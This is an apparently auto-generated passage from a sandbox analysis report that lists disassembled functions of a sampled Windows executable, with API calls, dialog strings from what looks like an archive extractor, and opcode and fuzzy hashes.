                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                    • API String ID: 3813983858-639343689
                                                                                                                    • Opcode ID: 34f7e90f6bf8d66b724ee2762ee9b245185ab1a7675eff36d434041c1dfe356b
                                                                                                                    • Instruction ID: 94cbf66c013a11a2501f139ad384ca9662fc02409524317947d3f4a3050af472
                                                                                                                    • Opcode Fuzzy Hash: 34f7e90f6bf8d66b724ee2762ee9b245185ab1a7675eff36d434041c1dfe356b
                                                                                                                    • Instruction Fuzzy Hash: 0031D07190424DAFEF11FBA48C4AFEE7FA9BB59300F104055F845B7292DB749A488B60
                                                                                                                    Function 0059AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00581316: GetDlgItem.USER32(00000000,00003021), ref: 0058135A
                                                                                                                      • Part of subcall function 00581316: SetWindowTextW.USER32(00000000,005B35F4), ref: 00581370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0059AD98
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0059ADAD
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0059ADC2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: ASKNEXTVOL
                                                                                                                    • API String ID: 445417207-3402441367
                                                                                                                    • Opcode ID: 9cd8d84feb3c5efa228e93bf620e85d4a01ac91efaae9269bf6d2d69128c25a7
                                                                                                                    • Instruction ID: 21d4feec9ccdc525954c6d65caf1613eba2e07506fa9edbfaaad7d34a923eb91
                                                                                                                    • Opcode Fuzzy Hash: 9cd8d84feb3c5efa228e93bf620e85d4a01ac91efaae9269bf6d2d69128c25a7
                                                                                                                    • Instruction Fuzzy Hash: E711D632240700AFDB159F68DD4DF6A3F69FB5A702F100810F685EB4A0C7619D49A7B6
                                                                                                                    Function 0059DDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DialogBoxParamW.USER32(GETPASSWORD1,00010448,0059B270,?,?), ref: 0059DE18
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DialogParam
                                                                                                                    • String ID: GETPASSWORD1$rY$xz]
                                                                                                                    • API String ID: 665744214-2500144767
                                                                                                                    • Opcode ID: 050186092eb2bac4d90414507aec88f58d16d418eb82ae02e7a6fdcf551cb74c
                                                                                                                    • Instruction ID: 9647bd91edca9ae292e0cf80b61654863e05396b3809fc0afe947f792dfd996c
                                                                                                                    • Opcode Fuzzy Hash: 050186092eb2bac4d90414507aec88f58d16d418eb82ae02e7a6fdcf551cb74c
                                                                                                                    • Instruction Fuzzy Hash: EE113B32600244AEDF21DA34AC89FAB3FA8B719311F144425FD49AB080CBB0AC48D370
                                                                                                                    Function 0058D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __fprintf_l.LIBCMT ref: 0058D954
                                                                                                                    • _strncpy.LIBCMT ref: 0058D99A
                                                                                                                      • Part of subcall function 00591DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,005C1030,00000200,0058D928,00000000,?,00000050,005C1030), ref: 00591DC4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                    • String ID: $%s$@%s
                                                                                                                    • API String ID: 562999700-834177443
                                                                                                                    • Opcode ID: 6861d69a8438a5a8fecd05a0b00ef898952b194672c3d563d2a98c9bea17e3be
                                                                                                                    • Instruction ID: 3bd2ecfd7895e8c82a575b034dbe63ff13bb73620c513fb7c51472736eaeffe8
                                                                                                                    • Opcode Fuzzy Hash: 6861d69a8438a5a8fecd05a0b00ef898952b194672c3d563d2a98c9bea17e3be
                                                                                                                    • Instruction Fuzzy Hash: EC215E72540249AADF21EEA4CC46FEE7FF8BB45704F140512FD10A61E2E272E6488B61
                                                                                                                    Function 00590E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0058AC5A,00000008,?,00000000,?,0058D22D,?,00000000), ref: 00590E85
                                                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0058AC5A,00000008,?,00000000,?,0058D22D,?,00000000), ref: 00590E8F
                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0058AC5A,00000008,?,00000000,?,0058D22D,?,00000000), ref: 00590E9F
                                                                                                                    Strings
                                                                                                                    • Thread pool initialization failed., xrefs: 00590EB7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                    • String ID: Thread pool initialization failed.
                                                                                                                    • API String ID: 3340455307-2182114853
                                                                                                                    • Opcode ID: 68f035126789f0009ed84bb40128427a30a1bd4df73dcab77f6f2c2d816f2a4f
                                                                                                                    • Instruction ID: 9098cc2b66bdce8cb04f14fc72b8e7452016f0d3560ab5e012401873019d9814
                                                                                                                    • Opcode Fuzzy Hash: 68f035126789f0009ed84bb40128427a30a1bd4df73dcab77f6f2c2d816f2a4f
                                                                                                                    • Instruction Fuzzy Hash: D61191B16007089FC3215F669C889A7FFECFB65744F144C2EF1DAC2240D671A9408B54
                                                                                                                    Function 0058124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Malloc
                                                                                                                    • String ID: (Y$2Y$A
                                                                                                                    • API String ID: 2696272793-4269916927
                                                                                                                    • Opcode ID: 6976bd7f410eeccffe7ade0d111d7708d41d444c7de422a8e892900e880b5213
                                                                                                                    • Instruction ID: 46b6ec591777f0731c6a7f5cd8df67ca36e76afdd49264b66b8f7119c87e4553
                                                                                                                    • Opcode Fuzzy Hash: 6976bd7f410eeccffe7ade0d111d7708d41d444c7de422a8e892900e880b5213
                                                                                                                    • Instruction Fuzzy Hash: D0011B75901219ABCB14DFA5D8489DEBBF8BF09310B10415AE906E7200D7349E45DF94
                                                                                                                    Function 0059DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                    • API String ID: 0-56093855
                                                                                                                    • Opcode ID: b2a9df8769c670b7f9d04aaf270851559a88270591fa342da10bed9a300b197b
                                                                                                                    • Instruction ID: eb7532b164f96645c257fb7537cb6f62ea69229649cb8d894210f971be810066
                                                                                                                    • Opcode Fuzzy Hash: b2a9df8769c670b7f9d04aaf270851559a88270591fa342da10bed9a300b197b
                                                                                                                    • Instruction Fuzzy Hash: 39019E76A04745AFCF249F54EC88EA63FB8F729398B000426F80597231C6319858FBB0
                                                                                                                    Function 00581316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0058E2E8: _swprintf.LIBCMT ref: 0058E30E
                                                                                                                      • Part of subcall function 0058E2E8: _strlen.LIBCMT ref: 0058E32F
                                                                                                                      • Part of subcall function 0058E2E8: SetDlgItemTextW.USER32(?,005BE274,?), ref: 0058E38F
                                                                                                                      • Part of subcall function 0058E2E8: GetWindowRect.USER32(?,?), ref: 0058E3C9
                                                                                                                      • Part of subcall function 0058E2E8: GetClientRect.USER32(?,?), ref: 0058E3D5
                                                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 0058135A
                                                                                                                    • SetWindowTextW.USER32(00000000,005B35F4), ref: 00581370
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                    • String ID: Y$0
                                                                                                                    • API String ID: 2622349952-400418000
                                                                                                                    • Opcode ID: 0a07e193eb9932e8f28680f6652d84ea9e679c1f238a61211d0094d49c15b9b5
                                                                                                                    • Instruction ID: 246aaffecc3ba87606e69ddcb1de4df31a2964cc3044a94c05524eae5d010d2e
                                                                                                                    • Opcode Fuzzy Hash: 0a07e193eb9932e8f28680f6652d84ea9e679c1f238a61211d0094d49c15b9b5
                                                                                                                    • Instruction Fuzzy Hash: F9F08130104A88ABDF196F50880EBE93FACBB50344F044918FC8675591CF74C995EB14
                                                                                                                    Function 005A9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1036877536-0
                                                                                                                    • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                    • Instruction ID: 7021a1ba3c6b9ce4073ed611a0372cdbca66371bb727c03a257ddaff23951da9
                                                                                                                    • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                    • Instruction Fuzzy Hash: 0AA137769047A69FEB21CF28C8917AEFFE5FF56320F28456DE4859B281C2389D41C760
                                                                                                                    Function 0058A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00587F69,?,?,?), ref: 0058A3FA
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00587F69,?), ref: 0058A43E
                                                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00587F69,?,?,?,?,?,?,?), ref: 0058A4BF
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00587F69,?,?,?,?,?,?,?,?,?,?), ref: 0058A4C6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2287278272-0
                                                                                                                    • Opcode ID: 2514d90d4fda26eac3e30cecd2065785b520138b5f90ea9d5337bdf511513ae2
                                                                                                                    • Instruction ID: 852b99a4a325af55a244cd4379734596230ee3a4782b30abaeec93eac475cd35
                                                                                                                    • Opcode Fuzzy Hash: 2514d90d4fda26eac3e30cecd2065785b520138b5f90ea9d5337bdf511513ae2
                                                                                                                    • Instruction Fuzzy Hash: 054195311483819AEB31EF24DC49F9EBFE4AF95700F140D1EB9D1A3191DAA49A48DB53
                                                                                                                    Function 005AC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,005A91E0,?,00000000,?,00000001,?,?,00000001,005A91E0,?), ref: 005AC9D5
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005ACA5E
                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,005A6CBE,?), ref: 005ACA70
                                                                                                                    • __freea.LIBCMT ref: 005ACA79
                                                                                                                      • Part of subcall function 005A8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,005ACA2C,00000000,?,005A6CBE,?,00000008,?,005A91E0,?,?,?), ref: 005A8E38
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2652629310-0
                                                                                                                    • Opcode ID: 32dbba3d2f756e31aa8c216fcc6fb69cd81867b9bd9d4ae696fdd7b87a0a187d
                                                                                                                    • Instruction ID: 9309c5737382fa38c9c07405376725385b4bc5401e3dc39feff30a1e365b79dc
                                                                                                                    • Opcode Fuzzy Hash: 32dbba3d2f756e31aa8c216fcc6fb69cd81867b9bd9d4ae696fdd7b87a0a187d
                                                                                                                    • Instruction Fuzzy Hash: EB318D72A0021AABDF25DF64DC45DBE7FA6FB42310B144268FC05E6290EB35DD54DBA0
                                                                                                                    Function 0059A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 0059A666
                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0059A675
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0059A683
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0059A691
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1035833867-0
                                                                                                                    • Opcode ID: 77892e339194a4f77d200b8eecaec5995080b578a06c452f25a08bfd2714920d
                                                                                                                    • Instruction ID: 62ddcfd9150be4d9ac17104135a238a5efaec287da49c6df507b187cae66588e
                                                                                                                    • Opcode Fuzzy Hash: 77892e339194a4f77d200b8eecaec5995080b578a06c452f25a08bfd2714920d
                                                                                                                    • Instruction Fuzzy Hash: 8EE01231942B71BBD7695B60BC8DF9B3E54AB25B53F010101FA459F1D0DB7486089BE1
                                                                                                                    Function 0059D06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcschr
                                                                                                                    • String ID: .lnk$dY
                                                                                                                    • API String ID: 2691759472-3084174456
                                                                                                                    • Opcode ID: 8ca2e8c3b383e9957781c66e501cb3b4c58bd677381b1104b9315692a8b94713
                                                                                                                    • Instruction ID: 5967bf7467e488afcbb3e19d62807da723fa7b71fb0fa46ba3486d494d1637f6
                                                                                                                    • Opcode Fuzzy Hash: 8ca2e8c3b383e9957781c66e501cb3b4c58bd677381b1104b9315692a8b94713
                                                                                                                    • Instruction Fuzzy Hash: BEA1517690012A9ADF24EBA4CD49EFA77FCBF44304F0885A2B509E7141EF749B848B71
                                                                                                                    Function 005875DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 005875E3
                                                                                                                      • Part of subcall function 005905DA: _wcslen.LIBCMT ref: 005905E0
                                                                                                                      • Part of subcall function 0058A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0058A598
                                                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0058777F
                                                                                                                      • Part of subcall function 0058A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0058A325,?,?,?,0058A175,?,00000001,00000000,?,?), ref: 0058A501
                                                                                                                      • Part of subcall function 0058A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0058A325,?,?,?,0058A175,?,00000001,00000000,?,?), ref: 0058A532
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                    • String ID: :
                                                                                                                    • API String ID: 3226429890-336475711
                                                                                                                    • Opcode ID: 4f169c325a7dfc8f4faddc7cc4b822e8760da545568d2f886466589ddcff4496
                                                                                                                    • Instruction ID: 11928df55ddf92c544749917bc275f895043e97712b90f6bc4300985d81ca073
                                                                                                                    • Opcode Fuzzy Hash: 4f169c325a7dfc8f4faddc7cc4b822e8760da545568d2f886466589ddcff4496
                                                                                                                    • Instruction Fuzzy Hash: 8E414D71805159AAEB25FB64CC5AEEEBB78FF85300F144096BA05B2092DB749F85CF60
                                                                                                                    Function 0058B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                                                                    Download Yara Rule
